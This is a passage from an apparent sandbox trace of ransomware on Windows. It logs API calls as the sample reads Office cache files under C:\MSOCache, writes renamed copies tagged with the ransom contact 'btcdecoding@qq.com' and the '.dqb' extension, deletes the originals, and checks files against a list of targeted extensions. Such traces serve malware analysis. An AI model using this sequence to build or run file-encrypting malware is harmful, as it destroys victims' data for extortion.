Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0033.006] GetLastError () returned 0x0 [0033.006] ReadFile (in: hFile=0x184, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x8f8, lpOverlapped=0x0) returned 1 [0033.008] WriteFile (in: hFile=0x188, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x900, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x900, lpOverlapped=0x0) returned 1 [0033.009] ReadFile (in: hFile=0x184, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.009] WriteFile (in: hFile=0x188, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0033.009] SetEndOfFile (hFile=0x188) returned 1 [0033.009] CloseHandle (hObject=0x188) returned 1 [0033.009] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.010] SetEndOfFile (hFile=0x184) returned 1 [0033.010] CloseHandle (hObject=0x184) returned 1 [0033.010] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0033.011] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0033.011] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.011] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.011] lstrlenW (lpString=".doc") returned 4 [0033.011] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.011] lstrlenW (lpString=".docx") returned 5 [0033.011] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0033.011] lstrlenW (lpString=".pdf") returned 4 [0033.011] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.011] lstrlenW (lpString=".xls") returned 4 [0033.011] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.011] lstrlenW (lpString=".xlsx") returned 5 [0033.011] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0033.011] lstrlenW (lpString=".ppt") returned 4 [0033.011] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.011] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.011] lstrlenW (lpString=".zip") returned 4 [0033.011] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.011] lstrlenW (lpString=".rar") returned 4 [0033.011] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.011] lstrlenW (lpString=".bz2") returned 4 [0033.011] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.011] lstrlenW (lpString=".7z") returned 3 [0033.011] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.011] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.011] lstrlenW (lpString=".dbf") returned 4 [0033.011] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.011] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.011] lstrlenW (lpString=".1cd") returned 4 [0033.012] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.012] lstrlenW (lpString=".jpg") returned 4 [0033.012] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.012] lstrlenW (lpString=".doc") returned 4 [0033.012] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString=".docx") returned 5 [0033.012] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0033.012] lstrlenW (lpString=".pdf") returned 4 [0033.012] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString=".xls") returned 4 [0033.012] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString=".xlsx") returned 5 [0033.012] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0033.012] lstrlenW (lpString=".ppt") returned 4 [0033.012] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.012] lstrlenW (lpString=".zip") returned 4 [0033.012] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.012] lstrlenW (lpString=".rar") returned 4 [0033.012] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString=".bz2") returned 4 [0033.012] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString=".7z") returned 3 [0033.012] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.012] lstrlenW (lpString=".dbf") returned 4 [0033.012] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.012] lstrlenW (lpString=".1cd") returned 4 [0033.012] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.012] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.013] lstrlenW (lpString=".jpg") returned 4 [0033.013] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.013] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0033.013] lstrlenW (lpString="PowerPointMUI.xml") returned 17 [0033.013] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.014] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1450) returned 1 [0033.014] CloseHandle (hObject=0x184) returned 1 [0033.014] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 0x2020 [0033.014] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0033.014] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.014] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.014] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.014] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0033.014] GetLastError () returned 0x0 [0033.014] ReadFile (in: hFile=0x184, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x5aa, lpOverlapped=0x0) returned 1 [0033.016] WriteFile (in: hFile=0x188, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0033.017] ReadFile (in: hFile=0x184, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.017] WriteFile (in: hFile=0x188, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0033.017] SetEndOfFile (hFile=0x188) returned 1 [0033.017] CloseHandle (hObject=0x188) returned 1 [0033.018] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.018] SetEndOfFile (hFile=0x184) returned 1 [0033.019] CloseHandle (hObject=0x184) returned 1 [0033.019] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0033.019] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml")) returned 1 [0033.019] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.019] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.019] lstrlenW (lpString=".doc") returned 4 [0033.019] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.019] lstrlenW (lpString=".docx") returned 5 [0033.019] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0033.019] lstrlenW (lpString=".pdf") returned 4 [0033.020] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString=".xls") returned 4 [0033.020] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString=".xlsx") returned 5 [0033.020] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0033.020] lstrlenW (lpString=".ppt") returned 4 [0033.020] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.020] lstrlenW (lpString=".zip") returned 4 [0033.020] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.020] lstrlenW (lpString=".rar") returned 4 [0033.020] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString=".bz2") returned 4 [0033.020] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString=".7z") returned 3 [0033.020] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.020] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.020] lstrlenW (lpString=".dbf") returned 4 [0033.020] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.020] lstrlenW (lpString=".1cd") returned 4 [0033.020] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.020] lstrlenW (lpString=".jpg") returned 4 [0033.020] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.020] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.020] lstrlenW (lpString=".doc") returned 4 [0033.020] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString=".docx") returned 5 [0033.020] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0033.020] lstrlenW (lpString=".pdf") returned 4 [0033.020] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.020] lstrlenW (lpString=".xls") returned 4 [0033.020] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.021] lstrlenW (lpString=".xlsx") returned 5 [0033.021] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0033.021] lstrlenW (lpString=".ppt") returned 4 [0033.021] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.021] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.021] lstrlenW (lpString=".zip") returned 4 [0033.021] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.021] lstrlenW (lpString=".rar") returned 4 [0033.021] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.021] lstrlenW (lpString=".bz2") returned 4 [0033.021] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.021] lstrlenW (lpString=".7z") returned 3 [0033.021] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.021] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.021] lstrlenW (lpString=".dbf") returned 4 [0033.021] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.021] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.021] lstrlenW (lpString=".1cd") returned 4 [0033.021] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.021] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 80 [0033.021] lstrlenW (lpString=".jpg") returned 4 [0033.021] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.021] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0033.021] lstrlenW (lpString="Setup.xml") returned 9 [0033.021] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.022] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1886) returned 1 [0033.022] CloseHandle (hObject=0x184) returned 1 [0033.022] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0033.022] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0033.022] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0033.022] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.022] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.022] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0033.022] GetLastError () returned 0x0 [0033.022] ReadFile (in: hFile=0x184, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x75e, lpOverlapped=0x0) returned 1 [0033.283] WriteFile (in: hFile=0x188, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x760, lpOverlapped=0x0) returned 1 [0033.284] ReadFile (in: hFile=0x184, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0033.284] WriteFile (in: hFile=0x188, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0033.284] SetEndOfFile (hFile=0x188) returned 1 [0033.284] CloseHandle (hObject=0x188) returned 1 [0033.285] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.285] SetEndOfFile (hFile=0x184) returned 1 [0033.285] CloseHandle (hObject=0x184) returned 1 [0033.285] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0033.376] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0033.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.376] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.376] lstrlenW (lpString=".doc") returned 4 [0033.376] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.376] lstrlenW (lpString=".docx") returned 5 [0033.376] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0033.376] lstrlenW (lpString=".pdf") returned 4 [0033.376] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString=".xls") returned 4 [0033.377] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString=".xlsx") returned 5 [0033.377] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0033.377] lstrlenW (lpString=".ppt") returned 4 [0033.377] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.377] lstrlenW (lpString=".zip") returned 4 [0033.377] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.377] lstrlenW (lpString=".rar") returned 4 [0033.377] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString=".bz2") returned 4 [0033.377] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString=".7z") returned 3 [0033.377] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.377] lstrlenW (lpString=".dbf") returned 4 [0033.377] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.377] lstrlenW (lpString=".1cd") returned 4 [0033.377] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.377] lstrlenW (lpString=".jpg") returned 4 [0033.377] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.377] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.377] lstrlenW (lpString=".doc") returned 4 [0033.377] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString=".docx") returned 5 [0033.377] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0033.377] lstrlenW (lpString=".pdf") returned 4 [0033.377] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString=".xls") returned 4 [0033.377] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0033.377] lstrlenW (lpString=".xlsx") returned 5 [0033.377] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0033.377] lstrlenW (lpString=".ppt") returned 4 [0033.378] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0033.378] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.378] lstrlenW (lpString=".zip") returned 4 [0033.378] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0033.378] lstrlenW (lpString=".rar") returned 4 [0033.378] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0033.378] lstrlenW (lpString=".bz2") returned 4 [0033.378] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0033.378] lstrlenW (lpString=".7z") returned 3 [0033.378] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0033.378] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.378] lstrlenW (lpString=".dbf") returned 4 [0033.378] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0033.378] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.378] lstrlenW (lpString=".1cd") returned 4 [0033.378] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0033.378] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0033.378] lstrlenW (lpString=".jpg") returned 4 [0033.378] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0033.378] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0033.378] lstrlenW (lpString="Setup.xml") returned 9 [0033.378] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0033.378] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=4207) returned 1 [0033.378] CloseHandle (hObject=0x178) returned 1 [0033.378] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0033.379] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0033.379] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0033.379] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0033.379] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) 